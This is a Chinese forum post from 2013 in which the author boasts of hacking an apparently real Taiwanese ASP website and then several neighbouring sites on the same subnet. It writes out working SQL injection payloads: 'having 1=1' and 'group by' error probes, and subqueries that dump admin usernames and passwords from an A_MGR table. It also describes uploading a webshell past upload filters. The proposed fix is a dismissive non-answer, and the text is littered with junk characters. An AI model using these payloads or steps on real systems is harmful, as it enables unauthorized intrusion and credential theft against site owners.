发现一个注入点
5 p# E/ I) q8 C% hhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
3 t; @& m* G. n0 c( k
: J- Y* F3 u$ T: K5 \6 R习惯性的加’having1=1--5 n$ U" a: I' @# e
( @$ ^" {) g8 A! p6 r) t# v5 N: p- Fhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—: ]# v* ]& _( C f1 V, n: y7 k6 Q
s4 `& A8 K8 w9 _" z% h8 ~0
( F7 c. @( _; C; t2 z
# V2 b( p- `+ N0 M爆出Diary_A.dl_Title(这时候很激动啊)
7 O6 v! j% U7 m
' W% c, N4 ?8 ]% g# |9 Q3 z1 V! U那么继续8 c( S* {/ ~7 u* i+ W
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
; ]6 M9 g4 j. ?! T* `6 X8 k6 ~2 t2 G Z9 v# Z6 S( ?2 m
继续,一直爆下去- a+ ] [4 r' v1 m3 e5 I# m
, w c; q/ f% O, f爆到几个字段和表段 但是没找到需要的管理用户的字段
5 @* f: W/ w+ _' P+ m, y. e! {9 Y ?6 | \2 j
蛋疼了 怎么办 然后去后台登陆页看源码
* O- ^! |- P# Q
* v4 `; H# p5 M1 N0 f0
5 C+ S* P: S4 }& W# a: q, u, V- U0 D' q6 i4 f1 Y9 x/ r+ b& Q! u5 A
Input name= “ADUID”
4 U# F \) D7 O) i1 m) JInput name= “ADPWD”
; L7 C5 q. G( D1 b$ x
" T4 {) Z% S( W( C! J很幸运 找到了字段那就继续
5 P+ M! Z6 M5 u q找到之后开始爆用户
! k4 Y, s2 @# a# O# q/ i ^1 |http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
8 g J; z) I5 [" G4 v1 c$ }爆密码 h2 A- v! O0 f" g; w
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
0 w" p* |2 {& |测试了下 这个注入点只能爆到文章哪里的表 1 f1 H+ z& g% s
% r# Q: ?: D5 V3 u5 p) A7 O$ ^' Q' c! D头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了7 y% @( y& R1 ?& K9 R- J# o
E! o% F) ]8 b# `3 q* n又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
4 y0 Q* e4 t6 h9 p O, x( C9 `9 v6 ]. s5 F4 \
473
# r6 E" c0 k3 m- Q9 k0 e. `; D2 F* x7 r5 c+ o2 n5 K% r
进后台5 K, P- O+ K2 X( Q& e: u3 A
& L5 `/ h( C3 W9 ?% Y+ E; G: t! q$ L7 A4 f
发现几个上传点 有的地方不能上传 而且防止恶意代码0 D' i2 g. ]. j- p. x
- Z2 G# f! T. |, u: R
没办法 各种百度各种找大牛 找到一只好像可以突破的马9 w8 N I1 u6 E1 E' t) X9 }/ I! u
. P' r# g; N: s7 i* i+ U9 q2 V
; B. S" t7 e4 u2 M+ g m
在系统管理那里直接上传 不过没有显示地址 G; B- m3 t( W& Z Y- G3 i7 U2 T) ]
% R ]! R C- f" q# W5 O: |7 c' f E再上传一次 抓包 搞定OK# d! H1 g+ x* S
( \; s$ n$ u" w# N& z; _0 V2 l0 F" X
" G+ `3 f' d) \3 M0 V5 m9 q
472" I6 I! U. a1 J
. G6 U1 j+ M, }% |$ N1 t+ q1 A晚上不行了 去睡觉。。。8 A5 }4 j; f* i' c6 M
第二天刚起床 闲的没事做继续日站吧 # F5 l9 J: ^! F% G3 n4 D
* u4 G7 Z/ \6 q; ^/ v
找个站 就把这个站的旁c扫了下
2 q1 s% `6 a$ Q5 X. W+ I8 D4 @
' Y' }0 H- ^0 [0 W/ q/ N7 u+ b. L发现c段也有一个购物站 ,然后还和这个站的模板差不多0 X: G* s. `5 t( n- |4 r' P7 E5 K& J
0 C% S7 ]4 j" U- n! J, K- y ]
就找到会员登录口测试# U8 y- [% I6 @+ Z' ~
' r( k) H! C! h
'and (select top 1 MGR_UID from A_MGR)>0—
& R7 V0 Q0 ?2 Y2 o( @( S果断爆到了 这时候我很激动 通杀- j9 R2 S& l" _5 i
V/ } d# ?. v i
再次翻c段
* G! G& e) w3 L3 N. O3 I- G5 D& ?- k$ y: b2 q
翻出几个站 都成功拿下" G% ^( e* u+ t1 ?. F8 }% R) T0 C' a
! H; F5 N/ {! E
3 o) k/ P* l% |; D5 n1 l3 a2 W9 j0 A ?+ [, e5 `
修复方案:% A1 j. C$ h% N9 M: Y
他们比我专业 9 u8 q; n2 Y) c
: b7 }/ r% J: ~6 i* z
; `2 N& _4 s0 w, e3 h$ A, ~
' u# o' S1 _" |3 T2 z3 r7 c; j5 e |
发表于 2013-4-4 17:40:38
收藏
支持
反对